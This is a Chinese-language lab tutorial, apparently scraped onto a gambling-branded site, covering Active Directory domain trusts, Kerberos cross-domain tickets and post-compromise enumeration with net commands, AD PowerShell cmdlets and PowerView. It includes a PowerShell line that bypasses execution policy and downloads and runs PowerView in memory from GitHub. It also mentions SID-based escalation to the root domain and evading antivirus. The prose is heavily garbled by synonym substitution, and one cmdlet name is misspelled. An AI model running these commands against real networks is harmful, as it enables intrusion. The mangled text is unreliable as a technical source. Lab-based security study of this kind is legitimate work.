Active Directory 渗入测试靶场(二) | 申博官网
登录
  • 欢迎进入申博官网!
  • 如果您觉得申博官网对你有帮助,那么赶紧使用Ctrl+D 收藏申博官网并分享出去吧
  • 这里是申博官方网!
  • 申博官网是菲律宾sunbet官网品牌平台!
  • 申博开户专业品牌平台!

Active Directory 渗入测试靶场(二)

申博_新闻事件 申博 183次浏览 已收录 0个评论

0x00 媒介

先引见一下域信托的基础道理,然后第二局部实际操作一下信息的罗列。

0x01 域信托的历程

竖立域之间的信托干系
在域状况中,竖立信托的两个域之间能够相互接见资本,固然,个中须要做一些权限上的设置。

信托偏向(单向或双向)
信托能够是单向或双向的。在双向信托中,任何一方的域都能够接见另一方。在单向信托中域A信托域B,这意味着域A是信托域,域B将是可托域。关于某个域中的用户接见另一个域中的资本,该用户须要位于受信托域中。看看下面的图表来相识单向信托:

Active Directory 渗入测试靶场(二)

左侧的是HH,右侧的是小Wing,HH对小Wing给了权限,将本身拜托给他,以是小Wing对HH有了接见的权限,被信托。

AD信托的范例

有种种信托范例。信托能够是通报性的或非通报性的。下表说清楚明了一些范例的信托:

信托范例 属性 信托偏向 考证体式格局 概况
树根节点 Transitive 双向 Kerberos V5 或NTLM 将新树增加到林中时自动建立
父节点-子节点 Transitive 双向 Kerberos V5 或NTLM 增加子域时自动建立
捷径 Transitive 单向或双向 Kerberos V5 或NTLM 手动建立,在林中运用,收缩信托途径以改良身份考证时刻
Transitive 单向或双向 Kerberos V5 或NTLM 手动建立。 用于在AD DS和林之间共享资本。

林中的通报信托
信托你具有通报性,比方A信托B,B信托C,那末A信托C

自动信托
默许状况下,增加子域的时刻会建立双向的信托,两种信托范例是父子信托和根信托。

下面是一张可视化的逾越信托界限的Kerberos道理的图片:

Active Directory 渗入测试靶场(二)

TGT就是一种特别票证,Ticket Granting Ticket,许可客户端在统一Kerberos域中猎取其他Kerberos票证,当客户端向密钥分发中央(KDC)发送票证要求时,KDC为客户端建立TGT(运用客户端暗码作为密钥,举行加密)并将加密的TGT发还给客户端。然后,客户端实验运用其暗码解密TGT。若是客户端胜利解密TGT(即,若是客户端供应了准确的暗码),它将保存解密的TGT,这是客户端的身份证明。

TGT许可客户端获得分外的票证(如TGS),这些票证许可你接见特定的效劳。

TGS:TGS代表单子受权效劳。TGS是KDC的一个组件,它在客户端要求与Kerberos效劳的衔接时发出效劳票证。客户须要有一个有用的TGT,然后才会向它发出TGS。

域之间的TGT:在林间信托的状况下,获得域间信托的TGT后,用这个TGT向别的一个信托域要求TGS,信托域运用信托暗码考证后,消费TGS返回客户端。

上面这个图解释一下:

  • DC1 的 Client从DC1要求TGT
  • DC1 用TGT相应(krbtgt hash)
  • Client再要求TGS
  • Client要求DC2,然则以后域并找不到效劳器,因而它运用Inter-realm TGT回应客户端
  • DC2返回的是用账户的hash加密的TGS
  • 客户端再用TGS去要求效劳器

这个历程平安客有师傅写过了。

竖立信托的认证局限
建立域信托的时刻,会让你挑选局限:

林局限的身份考证: 若是我们运用林局限的身份考证,则外部林中的用户与属于当地林的用户具有雷同级别的当地林资本接见权限。

挑选性身份考证: 若是是挑选性身份考证,则须要在域中的每台盘算机上手动分派权限,和愿望第二个林中的用户有权接见的资本。

0x02 示例

首先要准确设置装备摆设dns。
翻开DNS管理器

先设置许可地区传送
Active Directory 渗入测试靶场(二)

Active Directory 渗入测试靶场(二)

Active Directory 渗入测试靶场(二)

Active Directory 渗入测试靶场(二)

Active Directory 渗入测试靶场(二)

显现了网域材料,ok。

举行域信托设置
Active Directory 渗入测试靶场(二)

Active Directory 渗入测试靶场(二)

Active Directory 渗入测试靶场(二)

Active Directory 渗入测试靶场(二)

Active Directory 渗入测试靶场(二)

Active Directory 渗入测试靶场(二)

Active Directory 渗入测试靶场(二)

能够应用SID属性将子域的权限升级到根域。

完成后能够设置一些目次权限
Active Directory 渗入测试靶场(二)

Active Directory 渗入测试靶场(二)

0x03 罗列

  • AD是用LDAP作为接见协定
  • AD是经由过程DNS作为定位效劳,轻易找到域内其他主机。
  • AD数据库是NTDS.DIT

powershell内存加载

powershell.exe -exec Bypass -C “IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1’);Get-NetDomain”

先天生一个ps payload,假定我们获得一个目的的权限。

Active Directory 渗入测试靶场(二)

基础敕令

一些基础的信息收集敕令,下面的敕令请用域用户上岸靶机,否则没权限。

ipconfig /all

Active Directory 渗入测试靶场(二)

能够推断出pentestlab.com就是DC。

whoami /all

Active Directory 渗入测试靶场(二)

当地的组

net localgroup

Active Directory 渗入测试靶场(二)

显现当地管理员

net localgroup "administrators"

Active Directory 渗入测试靶场(二)

————————————-

申博网络安全巴士站

申博-网络安全巴士站是一个专注于网络安全、系统安全、互联网安全、信息安全,全新视界的互联网安全新媒体。

————————————-

搜检开放端口

netstat -an

Active Directory 渗入测试靶场(二)

细致检察历程

tasklist /V

Active Directory 渗入测试靶场(二)

体系信息

systeminfo

检察准时义务

schtasks /query /fo LIST /v

检察补钉状况

wmic qfe get Caption,Description,HotFixID,InstalledOn

Active Directory 渗入测试靶场(二)

经常使用的收集敕令

arp -a

Active Directory 渗入测试靶场(二)

显现域名:

echo %USERDOMAIN%

Active Directory 渗入测试靶场(二)

打印域控制器称号:

echo %logonserver%

Active Directory 渗入测试靶场(二)

域用户列表

net user /domain

Active Directory 渗入测试靶场(二)

打印AD域暗码战略:

net accounts /domain

Active Directory 渗入测试靶场(二)

AD信托干系:

nltest /domain_trusts

Active Directory 渗入测试靶场(二)

Active Directory PowerShell模块收集信息

这个模块是微软本身家的,优点在于能够减少被AV识别到的风险,和在PCL形式下也能够运用,然则只要windows server 2008 r2以上才支撑。
以下是一些经常使用的敕令示例。

有关AD用户的信息:

Get-ADUser -Filter *

Active Directory 渗入测试靶场(二)

Active Directory 渗入测试靶场(二)

查询域中一切的组细致信息

Get-ADGroup  -Filter *

Active Directory 渗入测试靶场(二)

过滤器能够本身挑选

Get-ADGroup -Filter {Name -like "*admin*"} | select name, GroupScope

就是显现管理员组

猎取以后域信息

Get-ADDomain

Active Directory 渗入测试靶场(二)

显现有关AD Forest的信息

Get-ADFroest

Active Directory 渗入测试靶场(二)

信托域的一切信息

Get-ADTrust -Filter *

Active Directory 渗入测试靶场(二)

运用Powerview罗列

Active Directory 渗入测试靶场(二)

猎取域内机械

Get-NetComputer

Active Directory 渗入测试靶场(二)

域控信息

Get-NetDomainController

Active Directory 渗入测试靶场(二)

组信息

Get-NetGroup

Active Directory 渗入测试靶场(二)

session信息

Get-NetSession

Active Directory 渗入测试靶场(二)

ACL信息

Get-ObjectAcl

Active Directory 渗入测试靶场(二)

检察接见权限

Find-LocalAdminAccess -Verbose

Active Directory 渗入测试靶场(二)

罗列管理员组成员

Invoke-EnumerateLocalAdmin -Verbose


申博|网络安全巴士站声明:该文看法仅代表作者自己,与本平台无关。版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明Active Directory 渗入测试靶场(二)
喜欢 (0)
[]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址